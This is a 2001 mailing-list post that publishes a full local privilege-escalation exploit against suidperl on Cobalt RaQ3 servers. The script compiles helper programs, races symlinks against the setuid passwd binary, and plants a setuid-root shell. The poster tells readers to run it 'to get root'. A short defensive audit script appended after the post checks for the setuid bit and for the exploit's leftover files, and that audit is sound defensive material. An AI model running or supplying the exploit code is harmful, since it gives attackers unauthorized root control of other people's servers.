[cobalt-users] suid perl - 2 month old hazard
- Subject: [cobalt-users] suid perl - 2 month old hazard
- From: "Arsalan Mahmud" <arsalan@xxxxxxxxxxxx>
- Date: Tue Nov 13 08:13:00 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
Hi,
Well, I have been sitting on this for over a month now since we found it on one of our hacked RaQ3's (thank god it was not wiped out or
tampered with). It works on all the RaQ3's we had, and I guess this is the best way to get a patch out, since upgrading the Perl version just
makes a mess of the Cobalt frontend, and a mail to Cobalt didn't get any responses for over 3 weeks now. And not to forget, if you upgrade
the server software from the command prompt, the warranty goes void.....
Save as "xperl.sh" and run with "perl xperl.sh" from a command prompt to get root..
------------ start -----------------------------
#!/bin/sh
# $Id: my-xperl.sh,v 1.1 2000/09/02 13:56:28 erzr Exp $
SUIDPERL=/usr/bin/suidperl
SUIDBIN=/usr/bin/passwd
if [ ! -u $SUIDPERL ]; then
echo "Sorry, $SUIDPERL is NOT setuid or does not exist"
exit 0
fi
if [ ! -u $SUIDBIN ]; then
echo "Sorry, $SUIDBIN is NOT setuid or does not exist"
exit 0
fi
cat >flare <<__eof__
#!/usr/bin/suidperl
print "Nothing can stop me now...\n";
__eof__
cat >bighole.c <<__eof__
main() {
setuid(0);
setgid(0);
chown("sush",0,0);
chmod("sush",04755);
}
__eof__
cat >sush.c <<__eof__
main() {
setuid(0);
setgid(0);
system("/bin/bash");
}
__eof__
make bighole sush
if [ ! -x ./sush ]; then
echo "Oops, seems to me I cannot compile helper applications."
fi
chmod 4755 ./flare
FILENAME='none
~!bighole
'
export interactive=1
PATH=.:$PATH
echo "waiting for our shell... It could take up to 5 minutes."
while :; do
( ln -f -s $SUIDBIN "$FILENAME";usleep $RANDOM; nice -n +20 $SUIDPERL ./"$FILENAME" <./flare & ) &>/dev/null &
( usleep $RANDOM ; ln -f -s /dev/stdin "$FILENAME" ) &>/dev/null &
if [ -u ./sush ]; then
echo "VOILA, BABE :-) Entering rootshell..."
rm -f "$FILENAME" sush.c bighole bighole.c flare
./sush
echo "cleaning up."
rm -f "$FILENAME" sush.c bighole bighole.c flare sush
exit 0
fi
done
--------- END ---------
If you think it was wrong of me to send this ... well, if our security can be compromised, it can be yours...
Bravo to Cobalt on their excellent "appliances"
--
Arsalan Mahmud
Nexus Technologies
http://www.nexus.net.pk
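A defender-side audit, added here as an example and not part of the original post or of Cobalt's software: it reports whether a suidperl binary still carries the setuid bit and scans a directory tree for the helper files the script above leaves behind. The binary path, the scan root and the artifact names are assumptions taken from the script above.

```shell
#!/bin/sh
# Added audit helper (not from the original post). Assumes the stock path
# /usr/bin/suidperl and the helper file names used by the script above.

# Report whether a suidperl binary is present with the setuid bit set.
# Returns 0 when the host is exposed (setuid suidperl found), 1 otherwise.
check_suidperl() {
    bin="${1:-/usr/bin/suidperl}"
    if [ -u "$bin" ]; then
        echo "EXPOSED: $bin is setuid; remove the bit (chmod u-s) or the binary"
        return 0
    fi
    echo "OK: $bin is absent or not setuid"
    return 1
}

# Scan a directory tree for leftovers of the script above: its helper
# sources/binaries and any setuid-root file, which is what the script
# produces on success. Prints each hit prefixed with ARTIFACT:;
# returns 0 if anything was found, 1 if the tree looks clean.
find_artifacts() {
    dir="$1"
    hits=$( { find "$dir" \( -name flare -o -name sush -o -name sush.c \
                          -o -name bighole -o -name bighole.c \) -print 2>/dev/null
              find "$dir" -type f -perm -4000 -user root -print 2>/dev/null
            } | sort -u )
    if [ -z "$hits" ]; then
        echo "OK: no exploit artifacts under $dir"
        return 1
    fi
    printf '%s\n' "$hits" | sed 's/^/ARTIFACT: /'
    return 0
}

# Run directly as: sh audit.sh [suidperl-path] [scan-dir]
if [ $# -gt 0 ]; then
    check_suidperl "$1"
    find_artifacts "${2:-/home}"
fi
```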